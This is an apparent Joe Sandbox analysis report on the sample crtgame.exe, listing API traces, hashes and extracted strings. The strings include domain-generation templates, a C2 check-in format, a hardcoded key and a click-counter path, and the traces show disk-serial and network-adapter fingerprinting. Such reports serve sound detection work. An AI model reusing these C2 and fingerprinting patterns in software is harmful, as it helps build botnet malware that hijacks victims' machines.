Opcode ID: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
Instruction ID: 7ab3d1d28a75e02bc3976350f442f418a05f15b5b9e5150e71043de01d347dcb
Opcode Fuzzy Hash: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
Instruction Fuzzy Hash: 195126F16043208BD7208B38CD447677BA0AB81324F1A473AE7E6FB2E0D73C8855871A

Function 00403CAC Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(000000FF,00000000,00008000,@q@,00403DAC,@q@,7622DFF0,?,00000000,?,?,00403E5E,00000010,00403113,?,?), ref: 00403CBB
HeapFree.KERNEL32(00000000,?,?,00403E5E,00000010,00403113,?,?), ref: 00403CF1

Strings

@q@, xrefs: 00403CAC, 00403CD1
@q@, xrefs: 00403CC1, 00403CCC

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: Free$HeapVirtual
String ID: @q@$@q@
API String ID: 3783212868-1591251108
Opcode ID: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
Instruction ID: c782c7eae1b72a8f5ff76f91d06b99a82836aed0f6ab4a515ec71bd81a8f307c
Opcode Fuzzy Hash: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
Instruction Fuzzy Hash: CCF03431A04210DFD7249F28EE09B427BF4FB08710B014A2AF5A6AB3E1C731AC40CF48

Function 00405716 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 0040572A

Strings

, xrefs: 0040574F
, xrefs: 00405773

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
Instruction ID: 1dc73218bf82df75e1ac1fd630f929f888ccf1ffeade1f599fe503148fb6ac43
Opcode Fuzzy Hash: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
Instruction Fuzzy Hash: 574127320046686EEB15A714DD59BFB3FA9DB06704F1400F6D94AFB1D2C27949288FAF

Function 00404523 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\CRTGame\crtgame.exe,00000104,?,00000000,?,?,?,?,00403010), ref: 00404546

Strings

x5r, xrefs: 0040454C
C:\Program Files (x86)\CRTGame\crtgame.exe, xrefs: 0040453A, 00404544, 00404569, 0040459F

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: FileModuleName
String ID: C:\Program Files (x86)\CRTGame\crtgame.exe$x5r
API String ID: 514040917-3688196230
Opcode ID: 34c9a041d7e1ec6d94fdd15091ce0eeee8a4f312eaeb7144eeef5d2c582a0afb
Instruction ID: c273e370235ef5c2b9ad44a33ec6d649ebcff4c88a8a8a568ed9852cde8aeaf0
Opcode Fuzzy Hash: 34c9a041d7e1ec6d94fdd15091ce0eeee8a4f312eaeb7144eeef5d2c582a0afb
Instruction Fuzzy Hash: FB1170B2900208BFD711EF98DD81CAB77BCEB45358B14017FF605B7241E6749E548BA9

Function 004039BC Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403784,?,?,?,00000100,?,00000000), ref: 004039E4
HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403784,?,?,?,00000100,?,00000000), ref: 00403A18
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403784,?,?,?,00000100,?,00000000), ref: 00403A32
HeapFree.KERNEL32(00000000,?,?,00000000,00403784,?,?,?,00000100,?,00000000), ref: 00403A49

Memory Dump Source

Source File: 00000005.00000002.2152494721.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2152494721.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_crtgame.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
Instruction ID: 1692a555d73bf0e7419dcacebfa4393f5b3048e317361d03b61efb90fa74d0f8
Opcode Fuzzy Hash: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
Instruction Fuzzy Hash: 6F116A702003019FC7218F28EE49E267BB9FB957217184A3AF1D2E75B0C7729961CF09

Analysis Process: crtgame.exePID: 1812, Parent PID: 5476COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.6%
Total number of Nodes:	751
Total number of Limit Nodes:	34

Executed Functions

Function 02C35F2A Relevance: 227.6, APIs: 82, Strings: 47, Instructions: 1836memorynetworksleepCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(02C673D8), ref: 02C35F59
GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C35F70
GetProcAddress.KERNEL32(00000000), ref: 02C35F79
GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C35F88
GetProcAddress.KERNEL32(00000000), ref: 02C35F8B

Part of subcall function 02C3F1FA: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C3F248
Part of subcall function 02C3F1FA: CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C3F269
Part of subcall function 02C3F1FA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C3F27D
Part of subcall function 02C3F1FA: CloseHandle.KERNEL32(00000000), ref: 02C3F286

GetTickCount.KERNEL32 ref: 02C35FCC
GetVersionExA.KERNEL32(02C67030), ref: 02C35FF9
_memset.LIBCMT ref: 02C36016
_malloc.LIBCMT ref: 02C36023
_malloc.LIBCMT ref: 02C36033
_malloc.LIBCMT ref: 02C36041
_malloc.LIBCMT ref: 02C3604C
_malloc.LIBCMT ref: 02C36057
_malloc.LIBCMT ref: 02C36062
_malloc.LIBCMT ref: 02C3606D
_malloc.LIBCMT ref: 02C3607C
GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C36093
RtlAllocateHeap.NTDLL(00000000), ref: 02C3609C
GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C360AB
RtlAllocateHeap.NTDLL(00000000), ref: 02C360AE
GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C360B9
RtlAllocateHeap.NTDLL(00000000), ref: 02C360BC
_memset.LIBCMT ref: 02C360CF
_memset.LIBCMT ref: 02C360DB
_memset.LIBCMT ref: 02C360E8
RtlEnterCriticalSection.NTDLL(02C673D8), ref: 02C360F6
RtlLeaveCriticalSection.NTDLL(02C673D8), ref: 02C36103
_malloc.LIBCMT ref: 02C36127

Part of subcall function 02C429CC: __FF_MSGBANNER.LIBCMT ref: 02C429E3
Part of subcall function 02C429CC: __NMSG_WRITE.LIBCMT ref: 02C429EA
Part of subcall function 02C429CC: RtlAllocateHeap.NTDLL(006C0000,00000000,00000001), ref: 02C42A0F

_malloc.LIBCMT ref: 02C36135
_malloc.LIBCMT ref: 02C3613C
_malloc.LIBCMT ref: 02C36160
QueryPerformanceCounter.KERNEL32(00000200), ref: 02C36170
Sleep.KERNELBASE ref: 02C3617E
_malloc.LIBCMT ref: 02C3618A
_malloc.LIBCMT ref: 02C36197
_memset.LIBCMT ref: 02C361AC
_memset.LIBCMT ref: 02C361BC
Sleep.KERNELBASE(00001388), ref: 02C361D8
RtlEnterCriticalSection.NTDLL(02C673D8), ref: 02C361E3
RtlLeaveCriticalSection.NTDLL(02C673D8), ref: 02C361F4
_memset.LIBCMT ref: 02C36249
_memset.LIBCMT ref: 02C36258
GetTickCount.KERNEL32 ref: 02C362FB
_memset.LIBCMT ref: 02C36325
wsprintfA.USER32 ref: 02C36C51
_memset.LIBCMT ref: 02C36C72
_memset.LIBCMT ref: 02C36C82
_memset.LIBCMT ref: 02C36CB1
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02C36D53
InternetSetOptionA.WININET(00000000,00000002,?), ref: 02C36D7B
InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02C36D93
InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02C36DAB
_memset.LIBCMT ref: 02C36DBB
InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 02C36DD4
InternetReadFile.WININET(00000000,?,00001000,?), ref: 02C36DF3
InternetCloseHandle.WININET(00000000), ref: 02C36E0D
InternetCloseHandle.WININET(00000000), ref: 02C36E18
_memset.LIBCMT ref: 02C36E63
RtlEnterCriticalSection.NTDLL(02C673D8), ref: 02C36E88
RtlLeaveCriticalSection.NTDLL(02C673D8), ref: 02C36E99
_malloc.LIBCMT ref: 02C36F20
RtlEnterCriticalSection.NTDLL(02C673D8), ref: 02C36F32
RtlLeaveCriticalSection.NTDLL(02C673D8), ref: 02C36F3E
_memset.LIBCMT ref: 02C36F58
_memset.LIBCMT ref: 02C36F67
_memset.LIBCMT ref: 02C36F77
_memset.LIBCMT ref: 02C36F86
_memset.LIBCMT ref: 02C36F98
_malloc.LIBCMT ref: 02C37012
_memset.LIBCMT ref: 02C37023
_strtok.LIBCMT ref: 02C37043
_swscanf.LIBCMT ref: 02C3705A
_strtok.LIBCMT ref: 02C37071
Sleep.KERNEL32(000007D0), ref: 02C37178
_memset.LIBCMT ref: 02C371EC
RtlEnterCriticalSection.NTDLL(02C673D8), ref: 02C371F9
RtlLeaveCriticalSection.NTDLL(02C673D8), ref: 02C3720B
_sprintf.LIBCMT ref: 02C372A0
RtlEnterCriticalSection.NTDLL(00000020), ref: 02C37364
RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C37398

Part of subcall function 02C35D33: _malloc.LIBCMT ref: 02C35D41

_malloc.LIBCMT ref: 02C37599
_memset.LIBCMT ref: 02C375A5

Strings

s%c%c%c%c%c%c.net, xrefs: 02C36618
idle, xrefs: 02C36EC1, 02C37224
client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d, xrefs: 02C36144
i%c%c%c%c%c%c.info, xrefs: 02C36997
Host: %s, xrefs: 02C36CBA
y%c%c%c%c%c%c.info, xrefs: 02C3640B
strcat, xrefs: 02C35F7B
r%c%c%c%c%c%c.com, xrefs: 02C36574
http://, xrefs: 02C36CCD
disconnect, xrefs: 02C36EB0, 02C371CC
q%c%c%c%c%c%c.ru, xrefs: 02C366BE
k%c%c%c%c%c%c.ua, xrefs: 02C36A3D
sprintf, xrefs: 02C35F6A
%d;, xrefs: 02C3729A
o%c%c%c%c%c%c.info, xrefs: 02C36781
i4hiea56#7b&dfw3, xrefs: 02C362D3, 02C36E35
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02C36209
updips, xrefs: 02C36ED2, 02C3724F
auth_swith, xrefs: 02C36FBB
urls, xrefs: 02C375B1
n%c%c%c%c%c%c.net, xrefs: 02C367D4
z%c%c%c%c%c%c.ua, xrefs: 02C364B1
b%c%c%c%c%c%c.com, xrefs: 02C36B03
j%c%c%c%c%c%c.info, xrefs: 02C36944
connect, xrefs: 02C36E9F, 02C36EFD
p%c%c%c%c%c%c.ua, xrefs: 02C36827
c%c%c%c%c%c%c.net, xrefs: 02C36BA7
m%c%c%c%c%c%c.com, xrefs: 02C36730
x%c%c%c%c%c%c.net, xrefs: 02C3645E
u%c%c%c%c%c%c.ua, xrefs: 02C3666B
f%c%c%c%c%c%c.ru, xrefs: 02C36A90
<htm, xrefs: 02C36E26
e%c%c%c%c%c%c.ua, xrefs: 02C36BFA
l%c%c%c%c%c%c.ru, xrefs: 02C3687A
a%c%c%c%c%c%c.ru, xrefs: 02C36C4B
h%c%c%c%c%c%c.net, xrefs: 02C369EA
d%c%c%c%c%c%c.info, xrefs: 02C36B54
, xrefs: 02C37512
ntdll.dll, xrefs: 02C35F65, 02C35F6F, 02C35F80
updurls, xrefs: 02C36EE3, 02C3757E
w%c%c%c%c%c%c.com, xrefs: 02C363BA
block, xrefs: 02C3702B
auth_ip, xrefs: 02C36FE7, 02C37270
t%c%c%c%c%c%c.info, xrefs: 02C365C5
/click/?counter=, xrefs: 02C36D15
g%c%c%c%c%c%c.com, xrefs: 02C368F3
v%c%c%c%c%c%c.ru, xrefs: 02C36504

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: _memset$_malloc$CriticalSection$Internet$Heap$EnterLeave$Handle$Allocate$CloseFileOptionProcessSleep$AddressCountModuleOpenProcTick_strtok$CounterCreateDirectoryInitializePerformanceQueryReadTimeVersionWindows_sprintf_swscanfwsprintf
String ID: $%d;$/click/?counter=$<htm$Host: %s$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua
API String ID: 2018021302-1381308451
Opcode ID: d12d1379446aefba8582088be1768aae2696eec5a49834b4c01d00b11b905d58
Instruction ID: 6b0b5dce57ec402ca5246d159f93b89e72e61589223f541b2591864fbc22d515
Opcode Fuzzy Hash: d12d1379446aefba8582088be1768aae2696eec5a49834b4c01d00b11b905d58
Instruction Fuzzy Hash: A3D217B36187A06ED3159B2C9C81B7FFBECAF89704F19092DF5D9C6142C628C645CB92

Function 02C35EB7 Relevance: 94.9, APIs: 47, Strings: 7, Instructions: 383memorylibraryloaderCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(02C673D8), ref: 02C35F59
GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C35F70
GetProcAddress.KERNEL32(00000000), ref: 02C35F79
GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C35F88
GetProcAddress.KERNEL32(00000000), ref: 02C35F8B
GetTickCount.KERNEL32 ref: 02C35FCC
GetVersionExA.KERNEL32(02C67030), ref: 02C35FF9
_memset.LIBCMT ref: 02C36016
_malloc.LIBCMT ref: 02C36023
_malloc.LIBCMT ref: 02C36033
_malloc.LIBCMT ref: 02C36041
_malloc.LIBCMT ref: 02C3604C
_malloc.LIBCMT ref: 02C36057
_malloc.LIBCMT ref: 02C36062
_malloc.LIBCMT ref: 02C3606D
_malloc.LIBCMT ref: 02C3607C
GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C36093
RtlAllocateHeap.NTDLL(00000000), ref: 02C3609C

Strings

client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d, xrefs: 02C36144
sprintf, xrefs: 02C35F6A
ntdll.dll, xrefs: 02C35F65, 02C35F6F, 02C35F80
strcat, xrefs: 02C35F7B
w%c%c%c%c%c%c.com, xrefs: 02C363BA
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02C36209
i4hiea56#7b&dfw3, xrefs: 02C362D3

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: _malloc$AddressHandleHeapModuleProc$AllocateCountCriticalInitializeProcessSectionTickVersion_memset
String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$i4hiea56#7b&dfw3$ntdll.dll$sprintf$strcat$w%c%c%c%c%c%c.com
API String ID: 1575141230-2290804818
Opcode ID: dd602f7c9b0b605a115311863cce5ce09833fdd5122e1cc86e3aa198105b0be1
Instruction ID: 10c2df1fb1f9f026ca33ee2625ba17c8fb3b23cf317f8a0f167be85741b05421
Opcode Fuzzy Hash: dd602f7c9b0b605a115311863cce5ce09833fdd5122e1cc86e3aa198105b0be1
Instruction Fuzzy Hash: F8D13771D48350AFD321AB34AC45B6BBFE8EF89314F140D2DFA84E7241DA749944CBA6

Function 02C3F3B3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C3F3C9
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C3F3E2
GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C3F407
FreeLibrary.KERNEL32(00000000), ref: 02C3F490

Strings

iphlpapi.dll, xrefs: 02C3F3BD
GetAdaptersInfo, xrefs: 02C3F3DC

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: Library$AdaptersAddressFreeInfoLoadProc
String ID: GetAdaptersInfo$iphlpapi.dll
API String ID: 514930453-3114217049
Opcode ID: 8a8f183934d924206b0f8069f704f6a434c0f1e5314977c9bd6c84d99f00a588
Instruction ID: a26ac466886b2baeea1c167296ee5d1dcf4d8296b883e34d480be03c48ac7d29
Opcode Fuzzy Hash: 8a8f183934d924206b0f8069f704f6a434c0f1e5314977c9bd6c84d99f00a588
Instruction Fuzzy Hash: 4B21A771E04219ABDB11CFA898446EEB7F8BF84324F1449BDD545E7601D730CA85CBA0

Function 02C32B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASetLastError.WS2_32(00000000,00000000,505C3A43,00000000), ref: 02C32BE4
WSARecv.WS2_32(?,?,00000002,?,?,00000000,00000000), ref: 02C32C07

Part of subcall function 02C39EA8: WSAGetLastError.WS2_32(?,00000080,00000017,02C33114), ref: 02C39EB6

WSASetLastError.WS2_32(?,?,?,?,00000000), ref: 02C32CD3
select.WS2_32(?,?,00000000,00000000,00000000), ref: 02C32CE7

Strings

3', xrefs: 02C32C85

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: ErrorLast$Recvselect
String ID: 3'
API String ID: 886190287-280543908
Opcode ID: c1ceda9092c9767c2cc0563561365963edddfdf8a1446b7021d805e1f207172d
Instruction ID: 1fd5631b541ba8a5a385a1e6f85051ba79b1911b4e794e78bd1926c74e6bc80c
Opcode Fuzzy Hash: c1ceda9092c9767c2cc0563561365963edddfdf8a1446b7021d805e1f207172d
Instruction Fuzzy Hash: 5F416AB19143058FDB129F74D9047ABBBE9EF84354F104D1EE99987280EB74D940CBA2

Function 02C3F2AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C3F2CE
DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C3F30C
GetLastError.KERNEL32 ref: 02C3F36D
CloseHandle.KERNELBASE(?), ref: 02C3F3A4

Strings

\\.\PhysicalDrive0, xrefs: 02C3F2C7

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceErrorFileHandleLast
String ID: \\.\PhysicalDrive0
API String ID: 4026078076-1180397377
Opcode ID: 2b5f4b58ce568bd9cceab95a410b8d2ed7040ea95db20d2d8756b34c5d7adb0b
Instruction ID: 90edbe105c08c6f635b0c6b84d5a65d44368172678a1c54beded40a71e84707c
Opcode Fuzzy Hash: 2b5f4b58ce568bd9cceab95a410b8d2ed7040ea95db20d2d8756b34c5d7adb0b
Instruction Fuzzy Hash: 4631E371D00229EBCB16CF95C884BBEBBB9FF84714F20496DE509A3680D7749B44CB90

Function 02C35C4F Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 90
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 02C35C5E

Part of subcall function 02C429CC: __FF_MSGBANNER.LIBCMT ref: 02C429E3
Part of subcall function 02C429CC: __NMSG_WRITE.LIBCMT ref: 02C429EA
Part of subcall function 02C429CC: RtlAllocateHeap.NTDLL(006C0000,00000000,00000001), ref: 02C42A0F

_memset.LIBCMT ref: 02C35C71
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000,?,?,?,00000000), ref: 02C35C7E
lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,00000000,?,?,?,00000000), ref: 02C35C86
lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,00000000), ref: 02C35C92
CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,00000000), ref: 02C35CAB
ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C35CC0
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 02C35CC7
__time64.LIBCMT ref: 02C35CDB
CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,00000000), ref: 02C35CF8
WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02C35D0D
CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02C35D14

Strings

\ts.dat, xrefs: 02C35C8C
C:\ProgramData\rc.dat, xrefs: 02C35C69, 02C35C6E, 02C35C85, 02C35C91, 02C35CA4, 02C35CED

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle$AllocateFolderHeapPathReadSpecialWrite__time64_malloc_memsetlstrcatlstrcpy
String ID: C:\ProgramData\rc.dat$\ts.dat
API String ID: 204396691-2903805982
Opcode ID: 4dfdf3e46360e277ed6d62c81558fa184168c760420b90d13a3ba5379bce6e0b
Instruction ID: 9219ea6402a98256d2e1ce00a8444c6399de2882e3eecc960ded4504aab0c30a
Opcode Fuzzy Hash: 4dfdf3e46360e277ed6d62c81558fa184168c760420b90d13a3ba5379bce6e0b
Instruction Fuzzy Hash: 7A2106729402187FE3106A649C88FBFF7ACDF85264F100A25F909B31C0C6705E898BB0

Function 02C31CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C31D11
GetLastError.KERNEL32 ref: 02C31D23

Part of subcall function 02C31712: __EH_prolog.LIBCMT ref: 02C31717

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C31D59
GetLastError.KERNEL32 ref: 02C31D6B
__beginthreadex.LIBCMT ref: 02C31DB1
GetLastError.KERNEL32 ref: 02C31DC6
CloseHandle.KERNEL32(00000000), ref: 02C31DDD
CloseHandle.KERNEL32(00000000), ref: 02C31DEC
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C31E14
CloseHandle.KERNELBASE(00000000), ref: 02C31E1B

Strings

thread, xrefs: 02C31DFB
thread.exit_event, xrefs: 02C31D84
thread.entry_event, xrefs: 02C31D3C

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
String ID: thread$thread.entry_event$thread.exit_event
API String ID: 831262434-3017686385
Opcode ID: 363b1f00ae4d80eb4f904cf14b4a2a812cb9795e52c99ab4f23094aedc4d9c84
Instruction ID: 4f2354863298ed73bba9442bb576ca98647d99a053e759cdf5327612d38639d3
Opcode Fuzzy Hash: 363b1f00ae4d80eb4f904cf14b4a2a812cb9795e52c99ab4f23094aedc4d9c84
Instruction Fuzzy Hash: F2318A719003109FD701EF20C848B2BBBE5EF85320F144A2DF8499B290DB71D989CBD2

Function 02C34CB1 Relevance: 16.8, APIs: 11, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 02C34CB6
RtlEnterCriticalSection.NTDLL(02C673D8), ref: 02C34CE2
RtlLeaveCriticalSection.NTDLL(02C673D8), ref: 02C34CEE

Part of subcall function 02C34B18: __EH_prolog.LIBCMT ref: 02C34B1D
Part of subcall function 02C34B18: InterlockedExchange.KERNEL32(?,00000000), ref: 02C34C1D

RtlEnterCriticalSection.NTDLL(02C673D8), ref: 02C34DBE
RtlLeaveCriticalSection.NTDLL(02C673D8), ref: 02C34DC4
RtlEnterCriticalSection.NTDLL(02C673D8), ref: 02C34DCB
RtlLeaveCriticalSection.NTDLL(02C673D8), ref: 02C34DD1
RtlEnterCriticalSection.NTDLL(02C673D8), ref: 02C34FD2
RtlLeaveCriticalSection.NTDLL(02C673D8), ref: 02C34FD8
RtlEnterCriticalSection.NTDLL(02C673D8), ref: 02C34FE3
RtlLeaveCriticalSection.NTDLL(02C673D8), ref: 02C34FEC

Memory Dump Source

Source File: 00000007.00000002.3368863709.0000000002C31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c31000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
String ID:
API String ID: 2062355503-0
Opcode ID: fdb334516fba3f5621989750c667dcde5e21e489faa8d49b3342b16971e4ce4b
Instruction ID: 9293098efa0b845a36c4caa29857dcf0abb96f73f4057f6555789dc8cbc29cad
Opcode Fuzzy Hash: fdb334516fba3f5621989750c667dcde5e21e489faa8d49b3342b16971e4ce4b
Instruction Fuzzy Hash: 77B16B71D0025DDFDF26DFA0C844BEDBBB5AF05314F14459AE809B6280DBB45A89CFA2

Function 02C326DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 02C32706
CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C3272B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C55583), ref: 02C32738

Part of subcall function 02C31712: __EH_prolog.LIBCMT ref: 02C31717

SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C32778
RtlLeaveCriticalSection.NTDLL(?), ref: 02C327D9

Strings

timer, xrefs: 02C32745

